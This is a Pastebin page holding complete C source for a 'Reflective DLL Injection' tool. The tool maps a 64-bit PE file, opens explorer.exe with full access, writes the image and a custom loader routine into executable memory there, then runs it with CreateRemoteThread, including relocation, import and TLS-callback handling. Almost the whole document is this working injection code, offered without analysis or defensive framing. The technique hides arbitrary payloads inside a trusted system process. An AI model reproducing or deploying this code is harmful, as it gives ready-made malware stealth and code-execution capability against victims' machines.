shifat627

Reflective DLL Injection

Dec 10th, 2018
1,216
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include<stdio.h>
  2. #include<windows.h>
  3. #include<tlhelp32.h>
  4. #include<string.h>
  5.  
  6.  
  7. typedef struct _PE_INFO
  8. {
  9.     LPVOID base;
  10.     BOOL reloc; //For If base relocation is needed
  11.     LPVOID Get_Proc; //Address OF GetProcAddress()
  12.     LPVOID Load_DLL; //Address OF LoadLibraryA()
  13. }PE_INFO , * LPE_INFO;
  14.  
  15. LPVOID Read_in_Memory(char * FileName)
  16. {
  17.     HANDLE f,h;
  18.     LPVOID mem;
  19.    
  20.     if((f=CreateFileA(FileName,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL))==INVALID_HANDLE_VALUE)
  21.     return NULL;
  22.    
  23.     if((h=CreateFileMappingA(f,NULL,PAGE_READONLY,0,0,NULL))==NULL)
  24.     return NULL;
  25.    
  26.     if((mem=MapViewOfFile(h,FILE_MAP_READ,0,0,0))==NULL)
  27.     return NULL;
  28.     else
  29.     return mem;
  30.    
  31. }
  32.  
  33. HANDLE Find_Process(char * process_name)
  34. {
  35.     HANDLE snap,proc;
  36.     PROCESSENTRY32 ps;
  37.     BOOL found=0;
  38.    
  39.     ps.dwSize=sizeof(ps);
  40.    
  41.     if((snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0) )==INVALID_HANDLE_VALUE)
  42.     return NULL;
  43.    
  44.     if(!Process32First(snap,&ps))
  45.     return NULL;
  46.    
  47.     do
  48.     {
  49.         if(!strcmp(process_name,ps.szExeFile))
  50.         {
  51.             found=1;
  52.             break;
  53.         }
  54.     }while(Process32Next(snap,&ps));
  55.    
  56.     CloseHandle(snap);
  57.     if(!found)
  58.     return NULL;
  59.    
  60.     if((proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID))==NULL)
  61.     {
  62.         return NULL;
  63.     }
  64.     else
  65.     return proc;
  66. }
  67.  
  68.  
  69. void AdjustPE(LPE_INFO pe)
  70. {
  71.     PIMAGE_DOS_HEADER dos;
  72.     PIMAGE_NT_HEADERS nt;
  73.     LPVOID base;
  74.     PIMAGE_IMPORT_DESCRIPTOR import;
  75.     PIMAGE_THUNK_DATA Othunk,Fthunk;
  76.     PIMAGE_BASE_RELOCATION reloc;
  77.     PIMAGE_TLS_DIRECTORY tls;
  78.     PIMAGE_TLS_CALLBACK * CallBack;
  79.     ULONGLONG * p,delta;
  80.    
  81.     BOOL (*DLL_Entry)(LPVOID , DWORD , LPVOID );
  82.     LPVOID (*Load_DLL)(LPSTR );
  83.     LPVOID (*Get_Proc)(LPVOID , LPSTR );
  84.    
  85.     base=pe->base;
  86.     Load_DLL=pe->Load_DLL;
  87.     Get_Proc=pe->Get_Proc;
  88.    
  89.     dos=(PIMAGE_DOS_HEADER)base;
  90.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  91.    
  92.     DLL_Entry=base+nt->OptionalHeader.AddressOfEntryPoint;
  93.    
  94.     if(!pe->reloc)
  95.     goto Load_Import;
  96.    
  97.     Base_Relocation:
  98.         if(nt->OptionalHeader.DataDirectory[5].VirtualAddress==0) //No Relocation Table Found
  99.         goto Load_Import;
  100.         delta=(ULONGLONG)base-nt->OptionalHeader.ImageBase;
  101.         reloc=(PIMAGE_BASE_RELOCATION)(base+nt->OptionalHeader.DataDirectory[5].VirtualAddress);
  102.         while(reloc->VirtualAddress)
  103.         {
  104.             LPVOID dest=base+reloc->VirtualAddress;
  105.             int nEntry=(reloc->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2;
  106.             PWORD data=(PWORD)((LPVOID)reloc+sizeof(IMAGE_BASE_RELOCATION));
  107.             int i;
  108.             for(i=0;i<nEntry;i++,data++)
  109.             {
  110.                 if(((*data)>>12)==10)
  111.                 {
  112.                     p=(PULONGLONG)(dest+((*data)&0xfff));
  113.                     *p+=delta;
  114.                 }
  115.             }
  116.            
  117.             reloc=(PIMAGE_BASE_RELOCATION)((LPVOID)reloc+reloc->SizeOfBlock);
  118.            
  119.         }
  120.         //End OF base Relocation
  121.        
  122.     Load_Import:
  123.         if(nt->OptionalHeader.DataDirectory[1].VirtualAddress==0)
  124.         goto TLS_CallBack;
  125.         import=(PIMAGE_IMPORT_DESCRIPTOR)(base+nt->OptionalHeader.DataDirectory[1].VirtualAddress);
  126.         while(import->Name)
  127.         {
  128.             LPVOID dll=(*Load_DLL)(base+import->Name);
  129.             Othunk=(PIMAGE_THUNK_DATA)(base+import->OriginalFirstThunk);
  130.             Fthunk=(PIMAGE_THUNK_DATA)(base+import->FirstThunk);
  131.            
  132.             if(!import->OriginalFirstThunk)
  133.             Othunk=Fthunk;
  134.            
  135.             while(Othunk->u1.AddressOfData)
  136.             {
  137.                 if(Othunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
  138.                 {
  139.                     *(ULONGLONG *)Fthunk=(ULONGLONG)(*Get_Proc)(dll,(LPSTR)IMAGE_ORDINAL(Othunk->u1.Ordinal));
  140.                 }
  141.                 else
  142.                 {
  143.                     PIMAGE_IMPORT_BY_NAME fnm=(PIMAGE_IMPORT_BY_NAME)(base+Othunk->u1.AddressOfData);
  144.                     *(PULONGLONG)Fthunk=(ULONGLONG)(*Get_Proc)(dll,fnm->Name);
  145.                 }
  146.                 Othunk++;
  147.                 Fthunk++;
  148.             }
  149.             import++;
  150.         }
  151.    
  152.    
  153.     TLS_CallBack:
  154.         if(nt->OptionalHeader.DataDirectory[9].VirtualAddress==0)
  155.         goto Execute_Entry;
  156.         tls=(PIMAGE_TLS_DIRECTORY)(base+nt->OptionalHeader.DataDirectory[9].VirtualAddress);
  157.         if(tls->AddressOfCallBacks==0)
  158.         goto Execute_Entry;
  159.        
  160.         CallBack=(PIMAGE_TLS_CALLBACK *)(tls->AddressOfCallBacks);
  161.         while(*CallBack)
  162.         {
  163.             (*CallBack)(base,DLL_PROCESS_ATTACH,NULL);
  164.             CallBack++;
  165.         }
  166.    
  167.    
  168.     Execute_Entry: 
  169.         (*DLL_Entry)(base,DLL_PROCESS_ATTACH,NULL);
  170.    
  171. }
  172.  
  173.  
  174. int main(int i,char **arg)
  175. {
  176.     if(i!=2)
  177.     {
  178.         printf("Usage %s <pe>",*arg);
  179.         return 0;
  180.     }
  181.    
  182.     HANDLE proc;
  183.     LPVOID base,Rbase,Adj;
  184.     PIMAGE_DOS_HEADER dos;
  185.     PIMAGE_SECTION_HEADER sec;
  186.     PIMAGE_NT_HEADERS nt;
  187.     DWORD Func_Size;
  188.     PE_INFO pe;
  189.    
  190.     printf("[+]Opening File...\n");
  191.    
  192.     if((base=Read_in_Memory(*(arg+1)))==NULL)
  193.     {
  194.         printf("[-]File I/O Error");
  195.         return 0;
  196.     }
  197.    
  198.     dos=(PIMAGE_DOS_HEADER)base;
  199.    
  200.     if(dos->e_magic!=23117)
  201.     {
  202.         printf("[-]Invalid File");
  203.         return 0;
  204.     }
  205.    
  206.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  207.     sec=(PIMAGE_SECTION_HEADER)((LPVOID)nt+24+nt->FileHeader.SizeOfOptionalHeader);
  208.    
  209.     if(nt->OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR64_MAGIC)
  210.     {
  211.         printf("[-]This is not 64 bit pe");
  212.         return 0;
  213.     }
  214.    
  215.     printf("\n[+]Open Process.....");
  216.    
  217.     if((proc=Find_Process("explorer.exe"))==NULL)
  218.     {
  219.         printf("[-]Failed To Open Process");
  220.         return 0;
  221.     }
  222.    
  223.     printf("[+]Allocating Memory Into Remote Process");
  224.    
  225.     pe.reloc=0;
  226.    
  227.     if((Rbase=VirtualAllocEx(proc,(LPVOID)nt->OptionalHeader.ImageBase,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
  228.     {
  229.         printf("\n[!]Failed To Allocate Memory AT %#p\n[!]Trying Alternative\n",nt->OptionalHeader.ImageBase);
  230.         pe.reloc=1;
  231.         if((Rbase=VirtualAllocEx(proc,NULL,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
  232.         {
  233.             printf("[-]Failed To Allocate Memory Into Remote Process");
  234.             return 0;
  235.         }
  236.     }
  237.    
  238.     printf("\n[+]Copying Headers");
  239.     WriteProcessMemory(proc,Rbase,base,nt->OptionalHeader.SizeOfHeaders,NULL);
  240.     printf("\n[+]Copying Sections...");
  241.     for(i=0;i<nt->FileHeader.NumberOfSections;i++)
  242.     {
  243.         WriteProcessMemory(proc,Rbase+sec->VirtualAddress,base+sec->PointerToRawData,sec->SizeOfRawData,NULL);
  244.         sec++;
  245.     }
  246.    
  247.     Func_Size=(DWORD)((ULONGLONG)main-(ULONGLONG)AdjustPE);
  248.     pe.base=Rbase;
  249.     pe.Get_Proc=GetProcAddress;
  250.     pe.Load_DLL=LoadLibraryA;
  251.    
  252.     if((Adj=VirtualAllocEx(proc,NULL,Func_Size+sizeof(pe),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
  253.     {
  254.         printf("\n[-]Failed To Allocate Memory for PE adjusting");
  255.         VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
  256.         return 0;
  257.     }
  258.    
  259.     WriteProcessMemory(proc,Adj,&pe,sizeof(pe),NULL);
  260.     WriteProcessMemory(proc,Adj+sizeof(pe),AdjustPE,Func_Size,NULL);
  261.     if(!CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)(Adj+sizeof(pe)),Adj,0,NULL))
  262.     printf("\n[-]Failed TO Adjust PE");
  263.     else
  264.     printf("\n[+]Adjusting PE And Executing....");
  265.    
  266.     return 0;
  267.    
  268. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×